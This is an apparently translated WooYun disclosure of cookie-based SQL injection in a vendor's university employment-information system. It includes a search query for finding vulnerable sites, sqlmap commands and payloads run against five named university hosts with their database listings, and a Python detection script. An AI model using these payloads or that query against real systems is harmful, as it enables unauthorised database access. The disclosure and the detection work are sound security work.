Vulnerability summary (followers: 24)
Defect ID: wooyun-2014-080434
Title: Generic cookie injection in a university employment information service system
Vendor: 上海甲鼎
Author: error
Submitted: 2014-10-23 11:09
Fix time: 2015-04-02 11:06
Published: 2015-04-02 11:06
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 18
Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center)
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-10-23: Details sent to the vendor; awaiting vendor handling
2014-10-28: Vendor chose to ignore the vulnerability; details opened to third-party security partners
2014-12-22: Details disclosed to core white hats and domain experts
2015-01-01: Details disclosed to regular white hats
2015-01-11: Details disclosed to intern white hats
2015-04-02: Details disclosed to the public
Brief description:
Generic cookie injection in a university employment information service system
Detailed description:
甲鼎 university employment information service system
NewsList.asp?TinforID
http://www.infojiading.cn/
Successful case:
http://www.infojiading.cn/Information.asp?TParentColumnId=0003
Baidu search: site:edu.cn 版权所有 技术支持:上海甲鼎
Injection URL: /NewsList.asp
Injection parameter: TinforID (sent in the Cookie header, not in the query string)
Proof of vulnerability:
(1) http://job.sicfl.edu.cn/
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:23:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:23:13] [INFO] fetching database names
[14:23:13] [INFO] fetching number of databases
[14:23:13] [INFO] resumed: 7
[14:23:13] [INFO] resumed: AadmissionsOffice
[14:23:13] [INFO] resumed: Graduate&Management
[14:23:13] [INFO] resumed: IJCenterOfCareer
[14:23:13] [INFO] resumed: master
[14:23:13] [INFO] resumed: model
[14:23:13] [INFO] resumed: msdb
[14:23:13] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb
(2) http://jy.shutcm.edu.cn/NewsList.asp
$ py sqlmap.py -u http://jy.shutcm.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TinforID=154' AND 2655=2655 AND 'EGSS'='EGSS
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=154'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TinforID=154' WAITFOR DELAY '0:0:5'--
---
[14:35:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[14:35:18] [INFO] fetching database names
[14:35:18] [INFO] fetching number of databases
[14:35:18] [INFO] resumed: 7
[14:35:18] [INFO] resumed: AadmissionsOffice
[14:35:18] [INFO] resumed: Graduate&Management
[14:35:18] [INFO] resumed: IJCenterOfCareer
[14:35:18] [INFO] resumed: master
[14:35:18] [INFO] resumed: model
[14:35:18] [INFO] resumed: msdb
[14:35:18] [INFO] resumed: tempdb
available databases [7]:
[*] [Graduate&Management]
[*] AadmissionsOffice
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb
(3) http://job.smic.edu.cn/NewsList.asp
$ py sqlmap.py -u http://job.smic.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end u
[*] starting at 15:12:08
[15:12:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[15:12:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-2964' OR (1859=1859) AND 'BIWo'='BIWo
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-7641' OR 4526=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(120)+CHAR(114)+CHAR(113)+(SELECT (
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
---
[15:12:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:12:09] [INFO] fetching database names
[15:12:09] [INFO] the SQL query used returns 10 entries
[15:12:09] [INFO] resumed: Graduate&Management
[15:12:09] [INFO] resumed: IJCenterOfCareer
[15:12:09] [INFO] resumed: master
[15:12:09] [INFO] resumed: model
[15:12:09] [INFO] resumed: msdb
[15:12:09] [INFO] resumed: Northwind
[15:12:09] [INFO] resumed: pubs
[15:12:09] [INFO] resumed: tempdb
[15:12:09] [INFO] resumed: xuegong
[15:12:09] [INFO] resumed: xuegongtest
available databases [10]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xuegong
[*] xuegongtest
(4) http://jyxx.shumc.edu.cn
$ py sqlmap.py -u http://jyxx.shumc.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 0
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
[*] starting at 15:23:54
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-6512' OR (3928=3928) AND 'ouRE'='ouRE
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5592' OR 8926=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(109)+CHAR(109)+CHAR(113)+(SELECT
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TinforID=1111'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: TinforID=-8878' OR 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysu
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:23:54] [INFO] resumed: Graduate&Management
[15:23:54] [INFO] resumed: IJCenterOfCareer
[15:23:54] [INFO] resumed: master
[15:23:54] [INFO] resumed: model
[15:23:54] [INFO] resumed: msdb
[15:23:54] [INFO] resumed: ReportServer$sql2005
[15:23:54] [INFO] resumed: ReportServer$sql2005TempDB
[15:23:54] [INFO] resumed: tempdb
[15:23:54] [INFO] resumed: Trans
[15:23:54] [INFO] resumed: Trans2
[15:23:54] [INFO] resumed: yuanl
available databases [11]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] ReportServer$sql2005
[*] ReportServer$sql2005TempDB
[*] tempdb
[*] Trans
[*] Trans2
[*] yuanl
(5) http://jy.sthu.edu.cn/
$ py sqlmap.py -u http://jy.sthu.edu.cn/NewsList.asp --cookie="TinforID=1111" --level 5 --risk 3 --dbs -v 1
---
Place: Cookie
Parameter: TinforID
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: TinforID=-1870' OR (6515=6515) AND 'whCL'='whCL
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: TinforID=-5376' OR 9872=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(104)+CHAR(110)+CHAR(113)+(SELECT
---
[21:47:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[21:47:43] [INFO] fetching database names
[21:47:43] [INFO] the SQL query used returns 6 entries
[21:47:43] [INFO] resumed: Graduate&Management
[21:47:43] [INFO] resumed: IJCenterOfCareer
[21:47:43] [INFO] resumed: master
[21:47:43] [INFO] resumed: model
[21:47:43] [INFO] resumed: msdb
[21:47:43] [INFO] resumed: tempdb
available databases [6]:
[*] Graduate&Management
[*] IJCenterOfCareer
[*] master
[*] model
[*] msdb
[*] tempdb
Remediation:
Filter (validate) the TinforID value before it reaches the query.
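As an added example, not part of the original report or the vendor's code, the following Python check implements the allow-list the remediation amounts to (TinforID must be a plain numeric id) and runs it over IIS W3C log lines that include the cs(Cookie) field, using the page's own payloads as constructed sample lines. It assumes the IIS convention of writing spaces inside logged header values as '+'; the field names and the TinforID length limit are assumptions.

```python
"""Flag SQL-injection attempts carried in the TinforID cookie, from IIS W3C logs."""
import re
from urllib.parse import unquote_plus

# Constructed sample: a #Fields directive plus three requests (not real traffic).
# IIS writes the request's Cookie header into cs(Cookie) with spaces as '+'.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs(Cookie) sc-status
2014-10-23 14:23:13 GET /NewsList.asp TinforID=154 200
2014-10-23 14:23:14 GET /NewsList.asp TinforID=154'+AND+2655=2655+AND+'EGSS'='EGSS 200
2014-10-23 14:23:20 GET /NewsList.asp TinforID=154';+WAITFOR+DELAY+'0:0:5'-- 200
"""

# Allow-list per cookie name: TinforID is a numeric record id (length limit assumed).
EXPECTED = {"TinforID": re.compile(r"\d{1,10}")}
# Second, name-independent signal: SQL syntax that never belongs in a record id.
SQL_TOKENS = re.compile(r"(?i)\b(waitfor|select|convert|union)\b|--|'")

def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split(" ")))

def cookie_findings(raw_cookie):
    """Return [(cookie_name, reason)] for a logged Cookie header value; [] if clean."""
    findings = []
    decoded = unquote_plus(raw_cookie)  # '+' -> ' ', %xx -> character
    # Note: a stacked-query payload contains ';', so naive cookie splitting cuts it;
    # the allow-list still fails on the fragment "154'", and the raw scan catches the rest.
    for part in decoded.split(";"):
        name, _, value = part.strip().partition("=")
        pattern = EXPECTED.get(name)
        if pattern and not pattern.fullmatch(value):
            findings.append((name, "value fails numeric allow-list"))
    if SQL_TOKENS.search(decoded):
        findings.append(("raw", "SQL syntax in Cookie header"))
    return findings

def scan_log(text):
    """Return [(time, uri, findings)] for requests whose cookies look injected."""
    hits = []
    for rec in parse_w3c(text):
        found = cookie_findings(rec.get("cs(Cookie)", ""))
        if found:
            hits.append((rec["time"], rec["cs-uri-stem"], found))
    return hits
```

The same `EXPECTED` check, applied in NewsList.asp before the value is used, is the input filter the remediation calls for; the log scan additionally shows which past requests would have failed it.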
Copyright notice: please credit the source when reposting: error@乌云
Vulnerability response
Vendor response:
Severity: No impact; vendor ignored
Ignored at: 2015-04-02 11:06
Vendor reply:
Latest status:
None yet